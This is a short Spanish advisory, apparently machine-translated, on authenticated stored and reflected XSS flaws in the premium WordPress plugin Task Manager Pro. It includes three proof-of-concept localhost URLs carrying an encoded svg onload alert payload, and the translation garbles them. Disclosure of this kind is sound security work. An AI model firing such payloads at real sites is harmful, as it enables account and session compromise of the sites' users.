Vulnerabilidad Plugin: WordPress Task Manager Pro

ATENCIÓN: Plugin Premium. Este plugin NO PERTENECE
al Repositorio Oficial de WordPress.

Varias vulnerabilidades Authenticated Cross-Site Scripting (XSS) se encuentran registradas como un usuario con privilegios bajos.
Authenticated Cross-Site Scripting (XSS)

Se registra como seguidor, el usuario privilegiado más bajo. Escribe la carga útil en la sección «Agregar un comentario»

Authenticated Reflected XSS

En tareas de edición, detalles de tareas, páginas de detalles del proyecto:

Https: //localhost/wp-admin/admin.php? Page = task-edit & task = 8% 2F% 22% 3E% 3Csvg% 2Fonload% 3Dalert% 28document.domain% 29% 3E
Https: //localhost/wp-admin/admin.php? Page = tarea-detalles & tarea = 6% 22% 2F% 3E% 3Csvg% 2Fonload% 3Dalert% 28document.domain% 29% 3E
Https: //localhost/wp-admin/admin.php? Page = proyecto-detalles & proyecto =% 22% 2F% 3E% 3Csvg% 2Fonload% 3Dalert% 28document.domain% 29% 3E

Authenticated Cross-Site Scripting (XSS)

Se registra como usuario con privilegios de edición:
Editar sección de tareas. Los campos Nombre de tarea y Estimación de tiempo son vulnerables.

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Ir arriba